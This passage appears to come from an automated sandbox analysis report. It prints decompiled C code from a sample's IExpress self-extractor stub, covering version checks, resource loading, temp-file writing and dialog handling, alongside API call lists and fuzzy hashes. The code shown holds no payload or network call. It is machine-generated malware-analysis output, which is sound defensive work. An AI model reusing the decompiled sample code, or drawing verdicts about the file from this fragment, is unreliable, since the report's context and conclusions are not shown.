                              • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 010E64F9
                              • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 010E6502
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: LibraryLoad$AttributesFile
                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
                              • API String ID: 438848745-3680919256
                              • Opcode ID: 73e6d5fb6f219a5ba4998a24d9ea374daa50e85b26edadfaa9c0cc9444596b3e
                              • Instruction ID: 9f91c51db5aa6aae658b93e98363e502b4d983628b79eeef358e2f9cbdae847c
                              • Opcode Fuzzy Hash: 73e6d5fb6f219a5ba4998a24d9ea374daa50e85b26edadfaa9c0cc9444596b3e
                              • Instruction Fuzzy Hash: 0401A231A001089FD7A4EB66EC4CAEA77F8EB64710F400199B5C597184DE76AA858B50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E010E28E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                              				void* _v8;
                              				char* _v12;
                              				intOrPtr _v16;
                              				void* _v20;
                              				intOrPtr _v24;
                              				int _v28;
                              				int _v32;
                              				void* _v36;
                              				int _v40;
                              				void* _v44;
                              				intOrPtr _v48;
                              				intOrPtr _v52;
                              				intOrPtr _v56;
                              				intOrPtr _v60;
                              				intOrPtr _v64;
                              				long _t68;
                              				void* _t70;
                              				void* _t73;
                              				void* _t79;
                              				void* _t83;
                              				void* _t87;
                              				void* _t88;
                              				intOrPtr _t93;
                              				intOrPtr _t97;
                              				intOrPtr _t99;
                              				int _t101;
                              				void* _t103;
                              				void* _t106;
                              				void* _t109;
                              				void* _t110;
                              
                              				_v12 = __edx;
                              				_t99 = __ecx;
                              				_t106 = 0;
                              				_v16 = __ecx;
                              				_t87 = 0;
                              				_t103 = 0;
                              				_v20 = 0;
                              				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                              					L19:
                              					_t106 = 1;
                              				} else {
                              					_t62 = 0;
                              					_v8 = 0;
                              					while(1) {
                              						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                              						if(E010E2773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                              							goto L20;
                              						}
                              						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
                              						_v28 = _t68;
                              						if(_t68 == 0) {
                              							_t99 = _v16;
                              							_t70 = _v8 + _t99;
                              							_t93 = _v24;
                              							_t87 = _v20;
                              							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                              								goto L18;
                              							}
                              						} else {
                              							_t103 = GlobalAlloc(0x42, _t68);
                              							if(_t103 != 0) {
                              								_t73 = GlobalLock(_t103);
                              								_v36 = _t73;
                              								if(_t73 != 0) {
                              									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                              										L15:
                              										GlobalUnlock(_t103);
                              										_t99 = _v16;
                              										L18:
                              										_t87 = _t87 + 1;
                              										_t62 = _v8 + 0x3c;
                              										_v20 = _t87;
                              										_v8 = _v8 + 0x3c;
                              										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                              											continue;
                              										} else {
                              											goto L19;
                              										}
                              									} else {
                              										_t79 = _v44;
                              										_t88 = _t106;
                              										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                              										_t101 = _v28;
                              										_v48 =  *((intOrPtr*)(_t79 + 8));
                              										_t83 = _v8 + _v16 + _v24 + 0x94;
                              										_t97 = _v48;
                              										_v36 = _t83;
                              										_t109 = _t83;
                              										do {
                              											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E010E2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                              											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E010E2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                              											_t109 = _t109 + 0x18;
                              											_t88 = _t88 + 4;
                              										} while (_t88 < 8);
                              										_t87 = _v20;
                              										_t106 = 0;
                              										if(_v56 < 0 || _v64 > 0) {
                              											if(_v52 < _t106 || _v60 > _t106) {
                              												GlobalUnlock(_t103);
                              											} else {
                              												goto L15;
                              											}
                              										} else {
                              											goto L15;
                              										}
                              									}
                              								}
                              							}
                              						}
                              						goto L20;
                              					}
                              				}
                              				L20:
                              				 *_a8 = _t87;
                              				if(_t103 != 0) {
                              					GlobalFree(_t103);
                              				}
                              				return _t106;
                              			}


































                              APIs
                              • GlobalFree.KERNEL32 ref: 010E2A6F
                                • Part of subcall function 010E2773: CharUpperA.USER32(9FDBF5B5,00000000,00000000,00000000), ref: 010E27A8
                                • Part of subcall function 010E2773: CharNextA.USER32(0000054D), ref: 010E27B5
                                • Part of subcall function 010E2773: CharNextA.USER32(00000000), ref: 010E27BC
                                • Part of subcall function 010E2773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010E2829
                                • Part of subcall function 010E2773: RegQueryValueExA.ADVAPI32(?,010E1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010E2852
                                • Part of subcall function 010E2773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010E2870
                                • Part of subcall function 010E2773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010E28A0
                              • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,010E3938,?,?,?,?,-00000005), ref: 010E2958
                              • GlobalLock.KERNEL32 ref: 010E2969
                              • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,010E3938,?,?,?,?,-00000005,?), ref: 010E2A21
                              • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 010E2A81
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                              • String ID:
                              • API String ID: 3949799724-0
                              • Opcode ID: 8d0d4da64087f1a7b386e4707aceab764fa264d8b3ae007d387a700f347d04f0
                              • Instruction ID: 9e077d0d352446e8b4a0058ce8ea4487db58af8a6c8ba33bf9875b1fce185c9d
                              • Opcode Fuzzy Hash: 8d0d4da64087f1a7b386e4707aceab764fa264d8b3ae007d387a700f347d04f0
                              • Instruction Fuzzy Hash: B3513E31E00219DFDB25DF9AC888AAEFBF9FF48700F18416AE995E7211D7359941CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 32%
                              			E010E4169(void* __eflags) {
                              				int _t18;
                              				void* _t21;
                              
                              				_t20 = E010E468F("FINISHMSG", 0, 0);
                              				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                              				if(_t21 != 0) {
                              					if(E010E468F("FINISHMSG", _t21, _t20) != 0) {
                              						if(lstrcmpA(_t21, "<None>") == 0) {
                              							L7:
                              							return LocalFree(_t21);
                              						}
                              						_push(0);
                              						_push(0x40);
                              						_push(0);
                              						_push(_t21);
                              						_t18 = 0x3e9;
                              						L6:
                              						E010E44B9(0, _t18);
                              						goto L7;
                              					}
                              					_push(0);
                              					_push(0x10);
                              					_push(0);
                              					_push(0);
                              					_t18 = 0x4b1;
                              					goto L6;
                              				}
                              				return E010E44B9(0, 0x4b5, 0, 0, 0x10, 0);
                              			}






                              APIs
                                • Part of subcall function 010E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46A0
                                • Part of subcall function 010E468F: SizeofResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46A9
                                • Part of subcall function 010E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46C3
                                • Part of subcall function 010E468F: LoadResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46CC
                                • Part of subcall function 010E468F: LockResource.KERNEL32(00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46D3
                                • Part of subcall function 010E468F: memcpy_s.MSVCRT ref: 010E46E5
                                • Part of subcall function 010E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46EF
                              • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,010E30B4), ref: 010E4189
                              • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,010E30B4), ref: 010E41E7
                                • Part of subcall function 010E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010E4518
                                • Part of subcall function 010E44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 010E4554
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                              • String ID: <None>$FINISHMSG
                              • API String ID: 3507850446-3091758298
                              • Opcode ID: 1683d704414b35d4daca7114a543ff4bc830d8642040fbf4e6c0362a113f1687
                              • Instruction ID: 60e6e793b66560f2ac8dcf9c844decc26569ee38ba34352c021fb904f5b26d76
                              • Opcode Fuzzy Hash: 1683d704414b35d4daca7114a543ff4bc830d8642040fbf4e6c0362a113f1687
                              • Instruction Fuzzy Hash: 2F01ADB1700215BFF7291A6B8C8DFBB65CEDBD8A95F0040A9B785E61849AB9CC0141B5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 93%
                              			E010E19E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                              				signed int _v8;
                              				char _v520;
                              				void* __esi;
                              				signed int _t11;
                              				void* _t14;
                              				void* _t23;
                              				void* _t27;
                              				void* _t33;
                              				struct HWND__* _t34;
                              				signed int _t35;
                              
                              				_t33 = __edi;
                              				_t27 = __ebx;
                              				_t11 =  *0x10e8004; // 0x9fdbf5b5
                              				_v8 = _t11 ^ _t35;
                              				_t34 = _a4;
                              				_t14 = _a8 - 0x110;
                              				if(_t14 == 0) {
                              					_t32 = GetDesktopWindow();
                              					E010E43D0(_t34, _t15);
                              					_v520 = 0;
                              					LoadStringA( *0x10e9a3c, _a16,  &_v520, 0x200);
                              					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                              					MessageBeep(0xffffffff);
                              					goto L6;
                              				} else {
                              					if(_t14 != 1) {
                              						L4:
                              						_t23 = 0;
                              					} else {
                              						_t32 = _a12;
                              						if(_t32 - 0x83d > 1) {
                              							goto L4;
                              						} else {
                              							EndDialog(_t34, _t32);
                              							L6:
                              							_t23 = 1;
                              						}
                              					}
                              				}
                              				return E010E6CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                              			}














                              APIs
                              • EndDialog.USER32(?,?), ref: 010E1A18
                              • GetDesktopWindow.USER32 ref: 010E1A24
                              • LoadStringA.USER32(?,?,00000200), ref: 010E1A4F
                              • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 010E1A62
                              • MessageBeep.USER32(000000FF), ref: 010E1A6A
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                              • String ID:
                              • API String ID: 1273765764-0
                              • Opcode ID: 70f6e06b495c1a31498465e69c00be9a295413983141dce4be9a480a7ec1475a
                              • Instruction ID: 19918536b8c2bbdeadd579b83861d6b53a2ed2d64767a52f395f8c51cc3c88a7
                              • Opcode Fuzzy Hash: 70f6e06b495c1a31498465e69c00be9a295413983141dce4be9a480a7ec1475a
                              • Instruction Fuzzy Hash: 4411A131600109EFDB20EF69EA0CABE7BF8EF49750F048195E992DB184DA359E11CB95
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 88%
                              			E010E63C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                              				signed int _v8;
                              				char _v268;
                              				long _v272;
                              				void* _v276;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t15;
                              				long _t28;
                              				struct _OVERLAPPED* _t37;
                              				void* _t39;
                              				signed int _t40;
                              
                              				_t15 =  *0x10e8004; // 0x9fdbf5b5
                              				_v8 = _t15 ^ _t40;
                              				_v272 = _v272 & 0x00000000;
                              				_push(__ecx);
                              				_v276 = _a16;
                              				_t37 = 1;
                              				E010E1781( &_v268, 0x104, __ecx, "C:\Users\jones\AppData\Local\Temp\IXP000.TMP\");
                              				E010E658A( &_v268, 0x104, _a12);
                              				_t28 = 0;
                              				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                              				if(_t39 != 0xffffffff) {
                              					_t28 = _a4;
                              					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                              						 *0x10e9124 = 0x80070052;
                              						_t37 = 0;
                              					}
                              					CloseHandle(_t39);
                              				} else {
                              					 *0x10e9124 = 0x80070052;
                              					_t37 = 0;
                              				}
                              				return E010E6CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                              			}
















                              APIs
                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 010E642D
                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 010E645B
                              • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 010E647A
                              Strings
                              • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 010E63EB
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: File$CloseCreateHandleWrite
                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                              • API String ID: 1065093856-305352358
                              • Opcode ID: 4690ccd8981d8b3b611f4a67a9df4b7b2bdabe8ac6559ae9a29e2aa8be7d7ede
                              • Instruction ID: e86f7c3869ed5baef272ef4edcfaf9363a92032aef5c215ba45568d8ee1add8b
                              • Opcode Fuzzy Hash: 4690ccd8981d8b3b611f4a67a9df4b7b2bdabe8ac6559ae9a29e2aa8be7d7ede
                              • Instruction Fuzzy Hash: 6C21C3B1A00218AFD720DF26EC88FEA77E8EB59714F0041A9B5C5A7240DAB59D848F64
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E010E47E0(intOrPtr* __ecx) {
                              				intOrPtr _t6;
                              				intOrPtr _t9;
                              				void* _t11;
                              				void* _t19;
                              				intOrPtr* _t22;
                              				void _t24;
                              				struct HWND__* _t25;
                              				struct HWND__* _t26;
                              				void* _t27;
                              				intOrPtr* _t28;
                              				intOrPtr* _t33;
                              				void* _t34;
                              
                              				_t33 = __ecx;
                              				_t34 = LocalAlloc(0x40, 8);
                              				if(_t34 != 0) {
                              					_t22 = _t33;
                              					_t27 = _t22 + 1;
                              					do {
                              						_t6 =  *_t22;
                              						_t22 = _t22 + 1;
                              					} while (_t6 != 0);
                              					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                              					 *_t34 = _t24;
                              					if(_t24 != 0) {
                              						_t28 = _t33;
                              						_t19 = _t28 + 1;
                              						do {
                              							_t9 =  *_t28;
                              							_t28 = _t28 + 1;
                              						} while (_t9 != 0);
                              						E010E1680(_t24, _t28 - _t19 + 1, _t33);
                              						_t11 =  *0x10e91e0; // 0x34b71c0
                              						 *(_t34 + 4) = _t11;
                              						 *0x10e91e0 = _t34;
                              						return 1;
                              					}
                              					_t25 =  *0x10e8584; // 0x0
                              					E010E44B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                              					LocalFree(_t34);
                              					L2:
                              					return 0;
                              				}
                              				_t26 =  *0x10e8584; // 0x0
                              				E010E44B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                              				goto L2;
                              			}
















                              APIs
                              • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,010E4E6F), ref: 010E47EA
                              • LocalAlloc.KERNEL32(00000040,?), ref: 010E4823
                              • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 010E4847
                                • Part of subcall function 010E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010E4518
                                • Part of subcall function 010E44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 010E4554
                              Strings
                              • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 010E4851
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: Local$Alloc$FreeLoadMessageString
                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                              • API String ID: 359063898-305352358
                              • Opcode ID: 1959c037caceaa55f6c6784649d72a55cc0e400ca9a8f39063ecbc490c21e19f
                              • Instruction ID: ae0e5b722709fefeb4acb3261b6cae43fb5717b90798a9eef993fb356a0b9530
                              • Opcode Fuzzy Hash: 1959c037caceaa55f6c6784649d72a55cc0e400ca9a8f39063ecbc490c21e19f
                              • Instruction Fuzzy Hash: B21136B5700601AFE7298E26981CF7A3BDAEBC5700F04845DE9C2CB345CA3ACC06C720
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 77%
                              			E010E6517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
                              				struct HRSRC__* _t6;
                              				void* _t21;
                              				struct HINSTANCE__* _t23;
                              				int _t24;
                              
                              				_t23 =  *0x10e9a3c; // 0x10e0000
                              				_t6 = FindResourceA(_t23, __edx, 5);
                              				if(_t6 == 0) {
                              					L6:
                              					E010E44B9(0, 0x4fb, 0, 0, 0x10, 0);
                              					_t24 = _a16;
                              				} else {
                              					_t21 = LoadResource(_t23, _t6);
                              					if(_t21 == 0) {
                              						goto L6;
                              					} else {
                              						if(_a12 != 0) {
                              							_push(_a12);
                              						} else {
                              							_push(0);
                              						}
                              						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                              						FreeResource(_t21);
                              						if(_t24 == 0xffffffff) {
                              							goto L6;
                              						}
                              					}
                              				}
                              				return _t24;
                              			}








                              APIs
                              • FindResourceA.KERNEL32(010E0000,000007D6,00000005), ref: 010E652A
                              • LoadResource.KERNEL32(010E0000,00000000,?,?,010E2EE8,00000000,010E19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 010E6538
                              • DialogBoxIndirectParamA.USER32(010E0000,00000000,00000547,010E19E0,00000000), ref: 010E6557
                              • FreeResource.KERNEL32(00000000,?,?,010E2EE8,00000000,010E19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 010E6560
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: Resource$DialogFindFreeIndirectLoadParam
                              • String ID:
                              • API String ID: 1214682469-0
                              • Opcode ID: f5fe3627c3c3bc1004ddc1a2f85ee6989a53240bb051367f573be9ec4632f243
                              • Instruction ID: 44db344cbe17339d9dcf8be21b4b6f8ae91a8989624eac15e7621805995329a7
                              • Opcode Fuzzy Hash: f5fe3627c3c3bc1004ddc1a2f85ee6989a53240bb051367f573be9ec4632f243
                              • Instruction Fuzzy Hash: A201D473300105BFDB205A5AAC08DAB7AECEB89761F010165FA9197144DA76CD1087A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E010E3680(void* __ecx) {
                              				void* _v8;
                              				struct tagMSG _v36;
                              				int _t8;
                              				struct HWND__* _t16;
                              
                              				_v8 = __ecx;
                              				_t16 = 0;
                              				while(1) {
                              					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                              					if(_t8 == 0) {
                              						break;
                              					}
                              					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                              						continue;
                              					} else {
                              						do {
                              							if(_v36.message != 0x12) {
                              								DispatchMessageA( &_v36);
                              							} else {
                              								_t16 = 1;
                              							}
                              							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                              						} while (_t8 != 0);
                              						if(_t16 == 0) {
                              							continue;
                              						}
                              					}
                              					break;
                              				}
                              				return _t8;
                              			}








                              APIs
                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 010E369F
                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010E36B2
                              • DispatchMessageA.USER32(?), ref: 010E36CB
                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010E36DA
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: Message$Peek$DispatchMultipleObjectsWait
                              • String ID:
                              • API String ID: 2776232527-0
                              • Opcode ID: c5a1ffd1cfa5568750c9fe66f05118bff92d0387fae048301d28ea3e338fdf99
                              • Instruction ID: d540ed2cb228577ffec65b8c72fe2e0a214c89ae4ff836a7235ec16d08be670f
                              • Opcode Fuzzy Hash: c5a1ffd1cfa5568750c9fe66f05118bff92d0387fae048301d28ea3e338fdf99
                              • Instruction Fuzzy Hash: C9017176A00214ABDB304AAB5C4CEABBFFCEBC9F10F004199BA45EB184D565C540CA60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 72%
                              			E010E65E8(char* __ecx) {
                              				char _t3;
                              				char _t10;
                              				char* _t12;
                              				char* _t14;
                              				char* _t15;
                              				CHAR* _t16;
                              
                              				_t12 = __ecx;
                              				_t15 = __ecx;
                              				_t14 =  &(__ecx[1]);
                              				_t10 = 0;
                              				do {
                              					_t3 =  *_t12;
                              					_t12 =  &(_t12[1]);
                              				} while (_t3 != 0);
                              				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                              				while(1) {
                              					_t16 = CharPrevA(_t15, ??);
                              					if(_t16 <= _t15) {
                              						break;
                              					}
                              					if( *_t16 == 0x5c) {
                              						L7:
                              						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                              							_t16 = CharNextA(_t16);
                              						}
                              						 *_t16 = _t10;
                              						_t10 = 1;
                              					} else {
                              						_push(_t16);
                              						continue;
                              					}
                              					L11:
                              					return _t10;
                              				}
                              				if( *_t16 == 0x5c) {
                              					goto L7;
                              				}
                              				goto L11;
                              			}










                              APIs
                              • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,010E2B33), ref: 010E6602
                              • CharPrevA.USER32(?,00000000), ref: 010E6612
                              • CharPrevA.USER32(?,00000000), ref: 010E6629
                              • CharNextA.USER32(00000000), ref: 010E6635
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: Char$Prev$Next
                              • String ID:
                              • API String ID: 3260447230-0
                              • Opcode ID: d8a2cd59008d77eaefa2e0953e6bbcfbdb9f8b42c9ad25808f2a85d1c3fab5c7
                              • Instruction ID: 57f11d350ae75b048ca88217acc0318f45caee9f11807e2f91d7ff4f4e32250c
                              • Opcode Fuzzy Hash: d8a2cd59008d77eaefa2e0953e6bbcfbdb9f8b42c9ad25808f2a85d1c3fab5c7
                              • Instruction Fuzzy Hash: ACF0F432205150AEE7330A2FAC8C8BBBFDCDB9F594F1941EFE8D587101D61B49068B61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E010E69B0() {
                              				intOrPtr* _t4;
                              				intOrPtr* _t5;
                              				void* _t6;
                              				intOrPtr _t11;
                              				intOrPtr _t12;
                              
                              				 *0x10e81f8 = E010E6C70();
                              				__set_app_type(E010E6FBE(2));
                              				 *0x10e88a4 =  *0x10e88a4 | 0xffffffff;
                              				 *0x10e88a8 =  *0x10e88a8 | 0xffffffff;
                              				_t4 = __p__fmode();
                              				_t11 =  *0x10e8528; // 0x0
                              				 *_t4 = _t11;
                              				_t5 = __p__commode();
                              				_t12 =  *0x10e851c; // 0x0
                              				 *_t5 = _t12;
                              				_t6 = E010E7000();
                              				if( *0x10e8000 == 0) {
                              					__setusermatherr(E010E7000);
